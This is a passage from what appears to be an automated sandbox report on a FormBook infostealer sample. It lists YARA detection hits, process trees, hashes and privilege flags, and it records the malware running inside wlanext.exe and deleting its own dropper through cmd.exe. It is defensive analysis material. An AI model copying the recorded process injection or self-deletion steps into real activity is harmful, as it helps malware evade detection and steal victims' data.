                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    Reputation:low

                                                                                                    Analysis Process: explorer.exe PID: 3424 Parent PID: 6644

                                                                                                    General

                                                                                                    Start time:13:30:15
                                                                                                    Start date:08/04/2021
                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:
                                                                                                    Imagebase:0x7ff6fee60000
                                                                                                    File size:3933184 bytes
                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Analysis Process: WerFault.exe PID: 1668 Parent PID: 7024

                                                                                                    General

                                                                                                    Start time:13:30:14
                                                                                                    Start date:08/04/2021
                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 2152
                                                                                                    Imagebase:0x1220000
                                                                                                    File size:434592 bytes
                                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Reputation:high

                                                                                                    Analysis Process: wlanext.exe PID: 6316 Parent PID: 3424

                                                                                                    General

                                                                                                    Start time:13:30:32
                                                                                                    Start date:08/04/2021
                                                                                                    Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                                                    Imagebase:0xe50000
                                                                                                    File size:78848 bytes
                                                                                                    MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                    Reputation:moderate

                                                                                                    Analysis Process: cmd.exe PID: 5900 Parent PID: 6316

                                                                                                    General

                                                                                                    Start time:13:30:37
                                                                                                    Start date:08/04/2021
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:/c del 'C:\Users\user\Desktop\PO45937008ADENGY.exe'
                                                                                                    Imagebase:0x11d0000
                                                                                                    File size:232960 bytes
                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Analysis Process: conhost.exe PID: 4676 Parent PID: 5900

                                                                                                    General

                                                                                                    Start time:13:30:37
                                                                                                    Start date:08/04/2021
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff724c50000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Disassembly

                                                                                                    Code Analysis

                                                                                                    Reset < >